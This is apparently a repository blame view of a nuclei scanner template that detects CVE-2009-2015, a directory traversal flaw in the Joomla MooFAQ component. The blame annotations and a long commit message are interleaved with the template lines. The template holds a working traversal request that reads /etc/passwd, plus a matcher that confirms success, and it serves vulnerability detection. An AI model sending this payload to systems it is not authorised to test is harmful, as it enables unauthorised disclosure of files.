daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2009/CVE-2009-2015.yaml

30 lines
852 B
YAML
Raw Normal View History

Adding daffainfo templates
2021-09-27 11:02:48 +00:00
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Update and rename CVE-2009-2015.yml to CVE-2009-2015.yaml
2021-09-27 12:33:20 +00:00
reference:
Adding daffainfo templates
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
Dashboard Content Enhancement (#4020) * Enhancement: cnvd/2021/CNVD-2021-15822.yaml by mp * Enhancement: exposed-panels/apache/tomcat-pathnormalization.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: exposed-panels/apiman-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-panel.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-rest-api.yaml by mp * Enhancement: exposed-panels/argocd-login.yaml by mp * Enhancement: exposed-panels/atlassian-crowd-panel.yaml by mp * Enhancement: exposed-panels/atvise-login.yaml by mp * Enhancement: exposed-panels/avantfax-panel.yaml by mp * Enhancement: exposed-panels/avatier-password-management.yaml by mp * Enhancement: exposed-panels/axigen-webadmin.yaml by mp * Enhancement: exposed-panels/axigen-webmail.yaml by mp * Enhancement: exposed-panels/azkaban-web-client.yaml by mp * Enhancement: exposed-panels/acunetix-panel.yaml by mp * Enhancement: exposed-panels/adiscon-loganalyzer.yaml by mp * Enhancement: exposed-panels/adminer-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: exposed-panels/adminset-panel.yaml by mp * Enhancement: exposed-panels/adobe/adobe-component-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-connect-central-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-experience-manager-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-media-server.yaml by mp * Enhancement: exposed-panels/advance-setup.yaml by mp * Enhancement: exposed-panels/aerohive-netconfig-ui.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-portal.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * spacing issues * Spacing * HTML codes improperly interpreted Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Enhancement: technologies/waf-detect.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: network/exposed-adb.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml by mp * Enhancement: exposures/tokens/digitalocean/tugboat-config-exposure.yaml by mp * Enhancement: exposed-panels/concrete5/concrete5-install.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml by mp * indentation issue * Character encoding issue fix * Enhancement: default-logins/alibaba/canal-default-login.yaml by mp * Enhancement: default-logins/alphaweb/alphaweb-default-login.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Enhancement: default-logins/apache/airflow-default-login.yaml by mp * Enhancement: default-logins/apache/apisix-default-login.yaml by mp * Enhancement: default-logins/apollo/apollo-default-login.yaml by mp * Enhancement: default-logins/arl/arl-default-login.yaml by mp * Enhancement: default-logins/digitalrebar/digitalrebar-default-login.yaml by mp * Enhancement: default-logins/mantisbt/mantisbt-default-credential.yaml by mp * Enhancement: default-logins/stackstorm/stackstorm-default-login.yaml by mp * Enhancement: dns/caa-fingerprint.yaml by mp * Enhancement: exposed-panels/active-admin-exposure.yaml by mp * Enhancement: exposed-panels/activemq-panel.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Restore & stomped by dashboard * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2021/CVE-2021-38751.yaml by mp * Enhancement: cves/2021/CVE-2021-39320.yaml by mp * Enhancement: cves/2021/CVE-2021-39322.yaml by mp * Enhancement: cves/2021/CVE-2021-39327.yaml by mp * Enhancement: cves/2021/CVE-2021-39350.yaml by mp * Enhancement: cves/2021/CVE-2021-39433.yaml by mp * Enhancement: cves/2021/CVE-2021-41192.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-15824.yaml by mp * Enhancement: exposed-panels/ansible-semaphore-panel.yaml by mp * Enhancement: exposed-panels/aviatrix-panel.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Enhancement: exposed-panels/blue-iris-login.yaml by mp * Enhancement: exposed-panels/bigbluebutton-login.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Spacing issues Add cve-id field * fix & stomping * Enhancement: cves/2016/CVE-2016-1000141.yaml by mp * Enhancement: cves/2020/CVE-2020-24912.yaml by mp * Enhancement: cves/2021/CVE-2021-35265.yaml by mp * Enhancement: cves/2022/CVE-2022-0437.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: technologies/teradici-pcoip.yaml by mp * Enhancement: vulnerabilities/other/unauth-hoteldruid-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: exposed-panels/epson-web-control-detect.yaml by mp * Enhancement: exposed-panels/epson-access-detect.yaml by mp * Enhancement: cves/2020/CVE-2020-29453.yaml by mp * Fix spacing * Remove empty cve lines and relocate tags * Remove blank cve lines & move tags * Fix merge errors * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-2551.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Syntax cleanup * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Syntax and a title change * Enhancement: cves/2021/CVE-2021-38702.yaml by mp * Fix references * Enhancement: cves/2021/CVE-2021-38704.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-44529.yaml by mp * Conflicts resolved * Fix quoting * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-23779.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/cobbler/hue-default-credential.yaml by mp * Enhancement: default-logins/emqx/emqx-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-14536.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Update CVE-2020-25223.yaml * Update CVE-2020-26214.yaml * Update CVE-2020-25506.yaml * Update CVE-2020-2551.yaml * Update CVE-2020-26919.yaml * Update CVE-2021-44529.yaml * Update CVE-2020-28871.yaml * Update CVE-2020-28188.yaml * Update CVE-2021-45967.yaml * Update hue-default-credential.yaml * Update CVE-2021-44529.yaml * misc syntax update * Syntax restore some characters * Spacing * Enhancement: vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/issuu-panel-lfi.yaml by mp * Enhancement: cves/2019/CVE-2019-10068.yaml by mp * Enhancement: cves/2019/CVE-2019-10232.yaml by mp * Enhancement: cves/2019/CVE-2019-10758.yaml by mp * Enhancement: cves/2019/CVE-2019-11510.yaml by mp * Enhancement: cves/2019/CVE-2019-11580.yaml by mp * Enhancement: cves/2019/CVE-2019-11581.yaml by mp * Enhancement: cves/2019/CVE-2019-12314.yaml by mp * Enhancement: cves/2019/CVE-2019-13101.yaml by mp * Link wrapping issue * Enhancement: cves/2019/CVE-2019-13462.yaml by mp * Enhancement: cves/2019/CVE-2019-15107.yaml by mp * Enhancement: cves/2019/CVE-2019-15859.yaml by mp * Enhancement: cves/2019/CVE-2019-16759.yaml by mp * Enhancement: cves/2019/CVE-2019-16662.yaml by mp * Enhancement: cves/2019/CVE-2019-16278.yaml by mp * Enhancement: cves/2019/CVE-2019-10232.yaml by mp * Enhancement: cves/2019/CVE-2019-10758.yaml by mp * Enhancement: cves/2019/CVE-2019-11510.yaml by mp * Enhancement: cves/2019/CVE-2019-12725.yaml by mp * Enhancement: cves/2019/CVE-2019-13101.yaml by mp * Enhancement: cves/2019/CVE-2019-15107.yaml by mp * Enhancement: cves/2019/CVE-2019-15859.yaml by mp * Enhancement: cves/2019/CVE-2019-16662.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-10543.yaml by cs * Enhancement: cves/2021/CVE-2021-33807.yaml by mp * Enhancement: cves/2010/CVE-2010-0943.yaml by mp * Enhancement: cves/2008/CVE-2008-6172.yaml by mp * Enhancement: vulnerabilities/simplecrm/simple-crm-sql-injection.yaml by mp * Enhancement: vulnerabilities/oracle/oracle-siebel-xss.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: network/cisco-smi-exposure.yaml by mp * Enhancement: cves/2021/CVE-2021-37704.yaml by mp * Enhancement: vulnerabilities/other/microweber-xss.yaml by mp * Enhancement: cves/2019/CVE-2019-16313.yaml by mp * Enhancement: cves/2021/CVE-2021-3017.yaml by mp * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-5278.yaml by mp * Enhancement: cves/2021/CVE-2021-37573.yaml by mp * Enhancement: vulnerabilities/oracle/oracle-siebel-xss.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: vulnerabilities/other/microweber-xss.yaml by mp * Enhancement: cves/2018/CVE-2018-11709.yaml by mp * Enhancement: cves/2014/CVE-2014-2321.yaml by mp * Enhancement: vulnerabilities/other/visual-tools-dvr-rce.yaml by mp * Enhancement: vulnerabilities/other/visual-tools-dvr-rce.yaml by mp * Manual enhancement * Manual enhancement push due to dashboard failure * Testing of dashboard accidentally commited to dashboard branch * Spacing Put some CVEs in the classification * Add missing cve-id fields to templates in cve/ Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-04-01 08:51:42 +00:00
classification:
cve-id: CVE-2009-2015
Adding daffainfo templates
2021-09-27 11:02:48 +00:00
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
Updated "/etc/passwd" regex to avoid possible false positive results.
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
Adding daffainfo templates
2021-09-27 11:02:48 +00:00
- type: status
status:
Update and rename CVE-2009-2015.yml to CVE-2009-2015.yaml
2021-09-27 12:33:20 +00:00
- 200